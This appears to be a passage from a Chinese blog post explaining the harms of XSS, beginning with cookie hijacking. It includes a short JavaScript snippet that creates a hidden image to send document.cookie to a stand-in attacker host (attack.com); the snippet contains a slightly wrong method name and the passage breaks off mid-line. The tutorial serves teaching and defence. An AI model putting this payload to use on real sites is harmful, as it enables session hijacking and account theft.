上次学习了一篇很好的文章以后,写了https://blog.csdn.net/weixin_42299862/article/details/108518706这么一篇读后感~现在继续总结一下,XSS能造成多大的危害。
1、cookie劫持
通过XSS漏洞,我们可以轻易的将javascript代码注入被攻击用户的页面并用浏览器执行。
如果用户的cookie没有设置Httponly,在javascript中可以通过“document.cookie”来获取用户的cookie内容,并可以轻易的发送到任意黑客指定的地址。
发送方式举例:
同源策略并不限制<img>
标签从别的网站(跨域)去下载图片,我们在注入JavaScript代码的时候,同时创建一个用户不可见的<img>
,通过这个<img>
发cookie发给攻击者http://attack.com
var img = document.createElement(‘img’);
img.src = ‘http://attack.com/?cookie=’ + document.cookie;
img.style.display = ‘none’;
document.getElementByName(‘body’)[